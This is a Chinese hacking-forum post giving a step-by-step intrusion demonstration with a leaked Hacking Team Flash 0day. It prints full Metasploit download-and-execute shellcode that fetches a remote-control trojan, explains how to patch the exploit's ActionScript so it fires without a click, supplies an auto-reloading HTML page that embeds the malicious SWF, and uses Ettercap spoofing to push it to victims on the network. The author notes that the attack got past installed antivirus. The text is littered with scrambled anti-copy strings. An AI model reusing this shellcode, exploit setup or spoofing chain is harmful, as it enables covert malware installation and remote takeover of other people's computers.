找回密码
 立即注册
查看: 2597|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; w* n1 H" O( n 三、flash 0day之手工代码修改制作下载者实例入侵演示 " j) X+ F1 y7 X

3 ^' h) i$ w' O3 Y

5 n' r3 _. {2 v4 F. B: t3 I* }8 P 利用到的工具: ( V, K; h& u) q! e

8 q7 ]. X2 D7 V

. d0 A, d/ u, I! c$ t/ A; A Msf & f6 t" X3 n6 j6 P$ Q" y4 U5 L

* t& I% k ~0 \, c) P7 {

! s- g$ Z W9 x& o" Y1 ]# E( r Ettercap 5 n o" e; d$ u( N, W I/ ?

" a8 j3 H0 I1 Y

S$ H# T, E! ^6 z Adobe Flash CS6 & v0 Q; ?9 w( c1 h) X

2 `. x) {% P$ I/ }* }7 j, o

2 T$ d% x( r. J' x( @/ t6 H5 Y+ T Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 : F4 r3 ^: F9 y1 ]4 c0 d& ^

, o9 \( H# L% Q4 j% ]7 p( b/ g

# O' [, n; i% R" Z( \) u8 j 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options ! {5 e$ ^, Z4 }9 {! j9 o

6 J( Z, q! Y: Z

8 W" f$ `. C4 q, g* K 如图: # w" |; i( I# [2 u3 @% ^

0 ~% A' {0 ~( U9 ?

' Q+ ?. Q% V+ }" f8 x! t   & ]4 W" Q& p$ d* t' O/ j1 ^/ Z' J" b

0 ~ C. g' X" N7 P

" e- l. R. b* W! c( f7 I   . @& M! b' J8 H4 m0 m. y% Z; @

3 v* B+ N- G9 }

1 \8 R& d$ `$ b4 K2 T. V- b/ d 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ' Q7 ]4 {# C3 H, I8 g: P( T

% m6 I+ b N9 t: I3 V

. n0 Y! z( u7 j" v- ~# |' Z3 t7 O2 |   7 u/ K2 U7 n# c- B8 H

6 P# o% h Z1 a& w2 `. y% H

6 @9 z# f6 w, b6 R9 G   & {$ X7 n: N& e, I

) |# ^, G u J

# _- x3 X9 k9 U8 q& n 然后执行generate -t dword生成shellcode,如下: 0 n% z- i x1 S- J

5 {+ s( B9 o' P) A0 b+ x* h$ F) J

+ v* m+ k" Z0 }' |; R   $ G1 _5 l* `- b

: c; p% j# j Y' B

0 o$ s. C" z1 T0 _& M 复制代码到文本下便于我们一会编辑flash exp,如下: ) R6 [# X& F& D& p+ k0 I! ]

2 i6 H, o. x3 v# H# ~8 l5 a

! a; U3 J3 \0 a. b6 L) k 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, - u1 a8 i1 ?. ]

$ j$ }* W5 T+ K a5 m: e7 n

5 m3 s: C8 |9 S% } 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ) I* S; I3 B' \

2 c5 e1 F, O# r. c2 ~' s# D

, ^; Q( F6 N7 |! l5 w N 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ) J; m8 X/ {; ~- K. V& }: @

- F+ Q+ h7 ^/ [* t8 {) |2 Y8 Z8 K

7 W, b, k' A8 J& T% R0 P/ w# O 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, % k) [" p1 N& C2 v

. @! q2 u7 [1 O2 m6 n9 _

; ?$ e8 ^1 g( i0 g, }3 E 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 5 d; t w+ Z/ a+ V4 J( S

* @4 ]$ D! X% b/ ]5 ^" ^2 o! \- L

) C" U, `, J1 x5 }2 l: q 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 y2 i7 v% B- N$ L o: k

0 k8 ~8 z0 B/ k+ e

4 r; u2 p$ D0 Z/ z8 H 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, / w1 t% ^/ m9 _

' r6 Y' z8 }4 Z: r1 I' c

0 h- C+ ]( v5 {, h' s' S7 B9 N 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 2 R/ ? N/ R6 z# K

: M' N2 s+ j/ i z9 E' W

* R5 E" w0 U- Q% m) i. q: l 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ; b4 h' U2 I8 e/ T5 |# H

) l2 s: O, U- r0 D6 h* H- |

/ e+ x* r9 R4 s# E" H ~6 d 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, " r) g, ?" n& n; c! g1 t

+ u9 d( W6 X3 D5 `1 T

) Z, \1 W$ W! \' j 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ( O9 B. T; S0 S- | S( Y

2 [8 O$ F8 R$ d# b! t

8 q6 x& X- @& q1 g4 b8 I- [/ k+ K 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, + g& S: A7 `; { d$ r

* l' [, r4 p7 K. Y

! [+ F4 v$ b. C) I. J0 D7 A 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - ~6 {) y) R- E- K

5 C5 v% z8 Y# {- `

" Q" `7 Y# r$ r. v, y8 D 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 , u8 p4 f/ r; j6 J& V4 ]

5 u) G. d# W1 l0 X, v; ] P; C- c

/ r4 Q# V: F H7 K- N   q7 c L9 b( s% ]* W

; U7 Q" t% u. F6 _: f

5 @5 t. p" k8 z e6 P. W. \# B3 s   # C5 R9 l1 r3 h- z( P1 T, P

+ t Q/ Y; q% k+ `" S2 ?

2 u6 ~) r+ b* y8 l 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 2 D% X* F4 k& w* v0 Z# `7 J

: Q8 f: S7 F; T$ {8 {" l

! A, B" r. x( D/ N+ M   2 E/ k$ j& B& y

8 @2 g2 |4 t4 f) T2 F

/ a( B5 y; x. @0 B4 k+ C7 i 先修改ShellWin32.as,部分源代码如图: . n) q( j! c! D# U! |# ]; u! u

: i; d- t1 _# x$ z

k3 m* i5 }8 ~0 k X: M# ` R   . [; ?. c9 Y: c. Y" I" c4 o$ l

! b5 d$ E8 Z+ C& Q! ^1 w

( ?0 l' d; x. e0 M1 _; O 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: " h1 D7 l: G. q

! l, m1 ?! C; M0 Q

/ `, h4 W8 u* P4 s( v- E& _5 u   , r5 x5 r2 r9 m9 d9 w. F! ]

' I8 G+ r/ n: W+ L/ ~$ A

/ y2 d, H) B7 O3 _) j" t 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: $ T- {7 b* a$ ~3 }# L

8 n9 x9 K0 n& j3 }

( J) f* H* j( P. I   6 x0 N, o/ i1 @; Q/ M# g' i

) B7 J+ i( W$ `$ z

- V3 c$ I4 ^3 L: P0 V 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: + a6 {; Z0 v+ E0 m) a% ]) }- C8 H2 `% I

4 e6 T' x; W ?+ Y6 t) G2 h4 G

2 }/ A+ e5 e- p' T m9 f   8 J7 v% |& U p2 h

% z" n e X% Q/ h

" j' \: J" H. _   - z" i9 o6 D1 A9 A7 ], {1 j/ ]

! a, ?0 d1 S; s$ Q& L) Q S4 l

7 ^- M0 c: R2 H( \5 w' Z! U   * K. L* q* r2 \+ z

C# \" n& n6 U! o

! ` g4 ~) N$ F" G2 k1 D# |3 X! U 然后点保存,下面我们来编译一下,打开 9 v2 Y5 b* J% D' ~

1 k! f$ q6 E, ]* n8 _

* \$ c) O0 j+ d4 N- A( _* T exp1.fla然后点文件-发布,看看编译没错误 6 Q: n' D R. P+ N0 Y. ]. a; i

. ?. k. Y6 C$ t6 E

: S4 g5 }% [1 y: y- ?3 t   ; i3 i7 ]" S* z) y# j8 o

5 G0 Q3 ]) [* ]1 l$ m

0 H% N; C) W- k9 I6 W1 P' U   / U* q7 [: G3 ?7 t) u# R

$ l$ q2 h6 s9 b' b" e

* h& j! k% F$ \1 d8 q# v9 k! {   3 ^: [) i: `& E- `& P) e

: d+ _+ E) b5 b8 g, B6 J

! Q$ H; A, ^$ H# U- G   + O( `+ d3 k4 c

% H4 ^, }# j$ @ Y, n, j: x U

# Q% E) H+ }: R: w. Y$ ~) h4 Q 然后我们把生成的 0 Z( W) }* X4 i; H# c

# U4 J7 L: ^5 L/ G4 z" v; [

7 _1 k6 s) L! v" ?, S exp1.swf丢到kailinux /var/www/html下: 4 l! l- o" P* @) Q

. f1 l$ A% b1 }+ Y0 n

9 q+ M- G2 D) P) L% X7 ~# o 然后把这段代码好好编辑一下 " I# Z9 d& ?# ?/ ?% s4 \& l

1 c8 x2 z6 u( p4 Q9 C

6 R! V. n4 @7 O1 p+ n1 g   ' P H: ?* N! \/ e7 L8 Z6 L

5 i& V( k9 }6 l* _; r

" c$ d' w2 }: T# t& O   7 n0 q) s; V% ?! \9 w

. R" ^6 w; t+ J n% C3 ~) c

# m0 b& T( v! D! c   : T1 D& J5 `" I5 ?5 |0 ~

$ C5 A; N! [# Z9 o: V. O# \

9 }" z% C; s- \+ X' {) T* W   4 U5 u8 ]! c: x7 e3 x; l

1 q- J9 L: k N4 \8 P) z, G

( m/ u- B2 n% C3 K8 ~0 [ L   ; P: J9 E. h( J4 p. x9 a

) _( x- U3 b% G3 s* T

) s$ z# b' }4 E: t o3 l* v9 a   $ |5 I: @. r8 ?0 Y0 P

4 l s1 Q" N* ` Y! ]

) w: b' I) k5 n <!DOCTYPE html> # ^# L) {3 r* A8 D0 I

) U0 c" ?- K) w6 c: M

! }8 t7 P \- i J+ |! T- f <html> 7 r. B9 U5 C# F _ w2 @7 m/ f

1 h% F. n- R1 a, \" N8 Z2 [/ u

( E/ @2 o1 o- {2 L0 ^7 w <head> & B% i5 s; F4 ~/ s2 Y w

/ `5 R2 i2 R7 p# N

1 I7 ^9 B* d5 a2 B6 W <meta http-equiv="Content-Type" content="text/html; 0 k/ Q7 R9 Z! S4 W, C

- Y6 M" Y; d' U# V a4 n7 T

4 @+ L$ G- Y6 |$ z& }+ K5 }4 { charset=utf-8"/> $ L [& j* Y. r+ z2 P; e1 [) ~

1 k! k1 B$ A4 m2 S6 Q9 X: Z, d/ t

8 X( r) W! f8 o* q& R, B* b </head> ! D" P3 b2 D0 |8 z n' e! U

$ P7 L5 g3 A1 { h% U6 T

4 y3 {8 I' m' o: g1 q <body> 2 V' x v2 U( h. }( c z

- `& H" K7 g a0 ]

$ L) }- B9 d/ a' r j) e8 l2 I8 a <h2> Please wait, the requested page is loading...</h2> 7 K4 q9 U1 n0 p0 j$ e0 v( Y

6 v8 E! _" i i( y2 V" W

& Q/ ~" d) T& I3 o <br> ' K% _! v+ j' }4 f; _

' ?( C9 z! |% N0 i

7 X8 f) P# m+ B5 q- a# E) X <OBJECT 8 t$ D: b. n1 t2 b

) H" w" F& K+ z% h) H

, o0 _/ j3 U3 N7 }- h classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 0 b+ w M v6 }0 `

: a. l# i* F) v) ^; |9 h3 F6 X

/ z6 @# x$ e, m VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ) U6 K2 f% F! ~

) g; V2 E. k7 O- W1 @

/ A- `& T, q: X) R </body> 2 M2 L# ]( K: |5 h5 L. x0 j& Q

' ~/ V: c1 U. y0 x

- Q, d6 z/ }& ]) r4 e. E; q <script> + x/ f$ R" J5 ?4 z( M

! X. C5 G+ k$ v% `

" ]; L! X) l. D, R# x2 m     setTimeout(function () { & i O! z5 r7 b: c$ j: p

9 t/ V4 ] {* P

8 L! H) ]' T+ }. i/ ?$ N8 Q          1 M* K, W2 |, I+ \& C

( L7 ~5 O& J, W0 r- L1 Q# A- \- I

3 V7 V' ~9 y1 V1 n8 O9 h window.location.reload(); ; B( ?' i) N, M' w" a

w; M. H/ O" l* P, a. |( j

- c5 Y7 `+ u8 F4 L     }, 10000); 3 y7 b5 ~9 P& I1 c7 _/ p. U

% W' J& ^9 x+ ^ S

! \, ?1 u* J7 j4 v( {' I6 z; a   ! p. G5 f+ ~0 l7 h3 {3 o8 M8 P$ b6 \

7 l0 d- |4 q- k; V8 ?. g8 T* i: \

/ ^; {) M3 O' R: ~8 F: ]$ ~ </script> ! b3 S4 A+ p) l6 v1 k

" w. _9 S: b0 d; {1 I

* E$ J4 u! T% \9 ~+ l$ i </html> & p, P% r& b! {7 G) w6 j5 t

+ u* u( a' f; \0 [

7 f4 @! z& P/ C3 ~8 H2 f; Y' j' [   ! T3 I% h+ y$ b

$ Q) r/ T& s$ Y; O+ q( f

; O6 @9 M6 j& r4 X/ j" g1 H, S/ f 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 6 ]% f `1 A& m* u5 W1 g

. H! e2 q' i) u1 _8 b# E

# i: v% i6 M4 p% t( C   ) d& i0 h# q8 \1 N- q' x9 y; V% W

% w5 t# s2 i% O. C+ A1 ~" D& [

$ m2 ?( I5 c: J) H0 u1 D) T   - P8 ]# o/ p, k B

' l3 i/ K# C2 {. }6 s, _$ ^: W

6 E% }* K% w# s0 ~8 {( s. ]   & z$ E& L3 f. Q5 s/ ?4 X- q

- U0 y. G; l( F# N( _8 ?8 e6 E

: I) X1 M% f+ w   ' i8 r/ i- B* i

% t8 d* E/ @+ ^+ q$ u

5 N; w; ]6 r; s. e$ G$ W   / ~7 F+ r) @* a5 Q

0 V# `* i! u# d3 k/ _ g: G

+ F4 ~! c, X: { 下面我们用ettercap欺骗如图: 3 h7 H1 |# s1 j

1 c) |3 I* R+ Z

& _2 p( N$ M' P/ Z% n   % F" i" M6 p1 h. g$ I

1 A x$ m' d8 `9 _! p5 ]4 Q% e

3 ^( s0 m" n/ {   5 R5 \7 r3 [% x& Z2 E- s1 |4 p

" I/ P6 R! u5 ` g# R( F- Z

8 a. f4 m3 J! S9 J/ o2 I 下面我们随便访问个网站看看: 0 s- s) ~5 j$ |' E1 ]/ {8 M

( x m5 o( a# ~2 ]" S0 r

+ q, z7 E; {+ f( P) s! ? 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 2 ]5 m2 T1 e6 ^3 _3 t# w9 k: d

6 K8 C6 S/ c9 k$ d# Z) S6 M

1 X0 m9 K9 m4 b8 q2 ]   , h9 V. t) ]/ H

; X# z& I) T4 C; t: ^2 H3 q

7 Q c; N4 e9 q @9 V 我们看另一台, - _1 z- J, @! U$ r( I b

* P0 |0 O, x: z2 |

. V6 }0 L; c8 V. q: F+ f- | 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 & g& P7 R! P( Z5 `

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表